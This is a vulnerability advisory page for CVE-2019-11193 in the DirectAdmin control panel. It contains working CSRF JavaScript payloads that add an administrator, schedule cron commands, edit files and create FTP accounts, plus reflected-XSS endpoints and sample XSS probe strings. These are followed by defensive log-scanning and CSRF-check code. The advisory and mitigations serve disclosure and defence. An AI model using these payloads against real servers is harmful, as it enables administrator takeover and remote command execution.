DirectAdmin 1.561 Cross Site Scripting

Published: 12 Apr 2019 00:00:00 | Reported by: Numan OZDEMIR | Type: packetstorm | Source: packetstormsecurity.com

DirectAdmin v1.561 Multiple Vulnerabilities Takeover

Related

| Source | Reference | Published |
|---|---|---|
| 0day.today (zdt) | DirectAdmin 1.561 - Multiple Vulnerabilities | 15 Apr 2019 00:00 |
| CVE | CVE-2019-11193 | 30 Apr 2019 18:36 |
| Cvelist | CVE-2019-11193 | 30 Apr 2019 18:36 |
| Exploit DB | DirectAdmin 1.561 - Multiple Vulnerabilities | 15 Apr 2019 00:00 |
| EUVD | EUVD-2019-2897 | 7 Oct 2025 00:30 |
| exploitpack | DirectAdmin 1.561 - Multiple Vulnerabilities | 15 Apr 2019 00:00 |
| NVD | CVE-2019-11193 | 30 Apr 2019 19:29 |
| Prion | Cross site request forgery (csrf) | 30 Apr 2019 19:29 |
| Positive Technologies | PT-2019-12174 | 30 Apr 2019 00:00 |
```
# Title: DirectAdmin Multiple Vulnerabilities to Takeover the Server <= v1.561
# Date: 12.04.2019
# Author: Numan OZDEMIR
# Vendor Homepage: https://www.directadmin.com/
# Version: Up to v1.561.
# CVE: CVE-2019-11193
# [email protected] && [email protected]
# Detailed: https://numanozdemir.com/respdisc/directadmin.pdf

# Description:
# Multiple security vulnerabilities have been discovered in the popular server
# control panel DirectAdmin by InfinitumIT. An attacker can chain these
# vulnerabilities to perform critical actions, up to taking over the server.
# The vulnerabilities (Cross Site Scripting and Cross Site Request Forgery)
# allow, among other things: adding an administrator, remote command execution
# (RCE), taking a full backup of the server and uploading it to the attacker's
# own server, and uploading a webshell.

# Reflected XSS Vulnerabilities:
# https://SERVERIP:2222/CMD_FILE_MANAGER/XSS-PAYLOAD
# https://SERVERIP:2222/CMD_SHOW_USER?user=XSS-PAYLOAD
# https://SERVERIP:2222/CMD_SHOW_RESELLER?user=XSS-PAYLOAD

# Example Payloads:
# Each payload is a credentialed cross-site POST: the browser of a logged-in
# DirectAdmin administrator sends it together with the session cookie, and the
# target form does not require an anti-CSRF token.

# Add Administrator:
var url = "http://SERVERIP:2222/CMD_ACCOUNT_ADMIN";
var params = "fakeusernameremembered=&fakepasswordremembered=&action=create&username=username&email=test%40test.com&passwd=password&passwd2=password&notify=ye";
var vuln = new XMLHttpRequest();
vuln.open("POST", url, true);
vuln.withCredentials = true; // attach the victim's session cookie
vuln.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
vuln.send(params);

# Remote Command Execution by Cron Jobs:
var url = "http://SERVERIP:2222/CMD_CRON_JOBS";
// "* * * * *" schedule: the command runs every minute as the victim's account
var params = "action=create&minute=*&hour=*&dayofmonth=*&month=*&dayofweek=*&command=command";
var vuln = new XMLHttpRequest();
vuln.open("POST", url, true);
vuln.withCredentials = true;
vuln.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
vuln.send(params);

# Edit File:
var url = "http://SERVERIP:2222/CMD_ADMIN_FILE_EDITOR";
var params = "file=the-file-full-path&action=save&text=new-content";
var vuln = new XMLHttpRequest();
vuln.open("POST", url, true);
vuln.withCredentials = true;
vuln.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
vuln.send(params);

# Create FTP Account:
var url = "http://SERVERIP:2222/CMD_FTP";
var params = "fakeusernameremembered=&fakepasswordremembered=&action=create&domain=infinitumit.com.tr&user=username&passwd=password&random=Save+Password&passwd2=password&type=domain&custom_val=%2Fhome%2Fusername&create=Create";
var vuln = new XMLHttpRequest();
vuln.open("POST", url, true);
vuln.withCredentials = true;
vuln.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
vuln.send(params);


# Vulnerabilities are fixed in minutes, thanks to DirectAdmin.
# InfinitumIT / For safer days...
```
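The three reflected XSS endpoints listed in the advisory (CMD_FILE_MANAGER path segment, and the `user` parameter of CMD_SHOW_USER and CMD_SHOW_RESELLER) can be watched for in web-server access logs. The following is an added example, not code from the advisory or from DirectAdmin: it parses combined-log-format lines, fully URL-decodes the reflected value for each endpoint (so a double-encoded `%253C` is caught too), and flags values carrying script-injection markers. The endpoint names come from the advisory; the sample lines, the marker list and all function names are constructed for this example, and DirectAdmin's own log format may differ from the combined format assumed here.

```javascript
// Added example (not from the advisory or DirectAdmin): flag reflected-XSS
// probes against the three vulnerable endpoints by scanning access logs.
// SAMPLE_LOG is constructed for this example.

// Where each vulnerable endpoint reflects attacker input.
const XSS_SINKS = [
  { endpoint: "CMD_FILE_MANAGER", where: "path" },                 // /CMD_FILE_MANAGER/<payload>
  { endpoint: "CMD_SHOW_USER", where: "query", param: "user" },     // ?user=<payload>
  { endpoint: "CMD_SHOW_RESELLER", where: "query", param: "user" }, // ?user=<payload>
];

// Heuristic markers of script injection once the value is decoded.
const XSS_MARKERS = [
  /<\s*\/?\s*(script|img|svg|iframe|body|object|embed)\b/i,
  /javascript\s*:/i,
  /\bon[a-z]+\s*=/i, // onerror=, onload=, ...
];

// Decode repeatedly (bounded) so double-encoded payloads do not slip past.
function fullyDecode(value) {
  let prev = null;
  let cur = value;
  for (let i = 0; i < 3 && cur !== prev; i++) {
    prev = cur;
    try {
      cur = decodeURIComponent(cur);
    } catch {
      break; // malformed escape: keep what we have
    }
  }
  return cur;
}

function looksLikeXss(value) {
  if (typeof value !== "string") return false;
  const decoded = fullyDecode(value);
  return XSS_MARKERS.some((re) => re.test(decoded));
}

// Combined log format: client ident user [time] "METHOD target PROTO" status size
const LINE_RE = /^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})/;

function parseAccessLine(line) {
  const m = LINE_RE.exec(line);
  return m ? { client: m[1], method: m[2], target: m[3], status: Number(m[4]) } : null;
}

// Inspect one request target; returns { endpoint, payload } or null.
function inspectTarget(target) {
  let u;
  try {
    u = new URL(target, "https://panel.invalid"); // base only so relative targets parse
  } catch {
    return null;
  }
  const segs = u.pathname.split("/").filter(Boolean);
  for (const sink of XSS_SINKS) {
    if (segs[0] !== sink.endpoint) continue;
    const raw = sink.where === "path" ? segs.slice(1).join("/") : u.searchParams.get(sink.param);
    if (raw && looksLikeXss(raw)) {
      return { endpoint: sink.endpoint, payload: fullyDecode(raw) };
    }
  }
  return null;
}

function scanAccessLog(lines) {
  const findings = [];
  for (const line of lines) {
    const req = parseAccessLine(line);
    if (!req) continue;
    const hit = inspectTarget(req.target);
    if (hit) findings.push({ client: req.client, status: req.status, ...hit });
  }
  return findings;
}

// Constructed sample: two single-encoded probes, one benign lookup, one
// double-encoded probe, and an unrelated login POST.
const SAMPLE_LOG = [
  '203.0.113.7 - - [12/Apr/2019:10:00:01 +0000] "GET /CMD_SHOW_USER?user=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 512',
  '203.0.113.7 - - [12/Apr/2019:10:00:02 +0000] "GET /CMD_FILE_MANAGER/%3Cimg%20src=x%20onerror=alert(1)%3E HTTP/1.1" 200 2048',
  '198.51.100.9 - - [12/Apr/2019:10:00:03 +0000] "GET /CMD_SHOW_RESELLER?user=bob HTTP/1.1" 200 900',
  '198.51.100.9 - - [12/Apr/2019:10:00:04 +0000] "GET /CMD_SHOW_USER?user=%253Csvg%2520onload%253Dalert(1)%253E HTTP/1.1" 200 512',
  '192.0.2.5 - - [12/Apr/2019:10:00:05 +0000] "POST /CMD_LOGIN HTTP/1.1" 302 0',
];

const FINDINGS = scanAccessLog(SAMPLE_LOG);
console.log(FINDINGS);
```

A 200 status on a flagged request is worth more attention than a 404: on an unpatched panel the payload was reflected to whoever opened the link, which is exactly the delivery step of the chain the advisory describes.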
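The CSRF payloads in the advisory succeed because the panel accepts a state-changing POST on the strength of the session cookie alone. As an added example (not DirectAdmin's code), the checks below are what a handler for CMD_ACCOUNT_ADMIN, CMD_CRON_JOBS, CMD_ADMIN_FILE_EDITOR or CMD_FTP would apply: an Origin/Referer check against the panel's own origin, a per-session anti-CSRF token compared in constant time, and a SameSite=Strict session cookie so the browser does not attach the session to a cross-site XMLHttpRequest in the first place. `PANEL_ORIGIN`, the `csrf_token` field name and the request and session objects are assumptions of the example; the forged request body is the advisory's "Add Administrator" parameters.

```javascript
// Added example (not DirectAdmin code): server-side checks that reject the
// credentialed cross-site POSTs sent by the advisory's payloads. The panel
// origin, the csrf_token field name and the request/session objects are
// assumptions of this example.
const crypto = require("node:crypto");

const PANEL_ORIGIN = "https://SERVERIP:2222"; // assumed origin of the panel itself
const STATE_CHANGING = new Set(["POST", "PUT", "DELETE", "PATCH"]);

// Mint a per-session token that every state-changing form must echo back.
function issueCsrfToken(session) {
  session.csrfToken = crypto.randomBytes(32).toString("hex");
  return session.csrfToken;
}

function parseForm(body) {
  return Object.fromEntries(new URLSearchParams(body || ""));
}

// Constant-time comparison; false for missing values or a length mismatch.
function tokensMatch(submitted, expected) {
  if (typeof submitted !== "string" || typeof expected !== "string") return false;
  const a = Buffer.from(submitted);
  const b = Buffer.from(expected);
  return a.length === b.length && crypto.timingSafeEqual(a, b);
}

// Returns { ok, reason }. Order: safe methods pass, then source origin, then token.
function checkCsrf(req, session) {
  if (!STATE_CHANGING.has(req.method)) return { ok: true, reason: "safe method" };
  const { origin, referer } = req.headers || {};
  if (origin !== undefined) {
    if (origin !== PANEL_ORIGIN) return { ok: false, reason: `cross-site Origin ${origin}` };
  } else if (referer !== undefined) {
    if (!referer.startsWith(PANEL_ORIGIN + "/")) return { ok: false, reason: "cross-site Referer" };
  } else {
    // Browsers send Origin on every cross-origin XHR/fetch POST, so a request
    // with neither header is not a normal panel form submission: reject it.
    return { ok: false, reason: "no Origin or Referer header" };
  }
  const form = parseForm(req.body);
  if (!tokensMatch(form.csrf_token, session.csrfToken)) {
    return { ok: false, reason: "missing or wrong csrf_token" };
  }
  return { ok: true, reason: "origin and token verified" };
}

// Cookie attributes that stop the browser attaching the session to a
// cross-site XMLHttpRequest at all (defence in depth beside the token).
function sessionCookie(sessionId) {
  return `session=${sessionId}; Path=/; Secure; HttpOnly; SameSite=Strict`;
}

// The advisory's "Add Administrator" form body, verbatim.
const ADD_ADMIN_BODY =
  "fakeusernameremembered=&fakepasswordremembered=&action=create&username=username&email=test%40test.com&passwd=password&passwd2=password&notify=ye";

// Demo: the request as an attacker page sends it (attacker Origin, no token)
// versus the same form submitted from the panel with the session's token.
function demo() {
  const session = { id: "s1" };
  const token = issueCsrfToken(session);
  const forged = {
    method: "POST",
    headers: { origin: "https://attacker.example", "content-type": "application/x-www-form-urlencoded" },
    body: ADD_ADMIN_BODY,
  };
  const legit = {
    method: "POST",
    headers: { origin: PANEL_ORIGIN, "content-type": "application/x-www-form-urlencoded" },
    body: `csrf_token=${token}&${ADD_ADMIN_BODY}`,
  };
  return { forged: checkCsrf(forged, session), legit: checkCsrf(legit, session) };
}

console.log(demo(), sessionCookie("s1"));
```

These checks do not stop the reflected XSS: script running on the panel's own origin passes the Origin check and can read `csrf_token` out of the page, which is why the advisory's chain pairs the two bug classes and why the three XSS sinks need output encoding independently of any CSRF defence.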


Vulners AI Score: 8.9 (High risk) | EPSS: 0.01231